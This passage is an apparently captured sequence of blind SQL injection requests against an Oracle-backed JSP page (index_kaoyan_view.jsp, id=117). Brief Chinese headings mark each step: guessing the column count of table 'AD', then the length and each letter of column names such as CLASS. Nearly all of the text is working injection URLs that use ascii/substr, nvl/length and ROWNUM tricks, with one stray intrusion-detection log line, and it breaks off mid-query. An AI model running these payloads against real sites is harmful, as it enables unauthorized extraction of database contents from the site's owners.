<P>以下猜解列名长度的第二位为:0(个位)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>Informational 10/12/2005 15:03:25 Suspect event: ICMP Time Exceeded (&gt; 1 for 1 seconds)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 77&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 109&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 102&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 99&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 97&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 53&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 51&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 50&gt;ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))</P>
<P><BR> 以下为猜解第一列的第一个字段名CLASS的长度为:5<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2&lt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 4&gt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 5&lt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 9&gt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 7&gt;nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P> 以下为猜解第一列第一个字段的第一位为:C<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 71&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 68&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 66=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 66&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))</P>
<P> 以下为猜解第一列第一个字段的第一位为:L<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 79&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 73&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))</P>
<P> 以下为猜解第一列第一个字段的第三位为:A<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 83&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 79&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 77&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 70&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 67&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))</P>
<P><BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 84&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 81&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 82&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))</P>
<P><BR> 以下为猜解第二列:<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2&lt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 4&gt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 5&lt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 9&gt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 78&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 71&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 74&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE 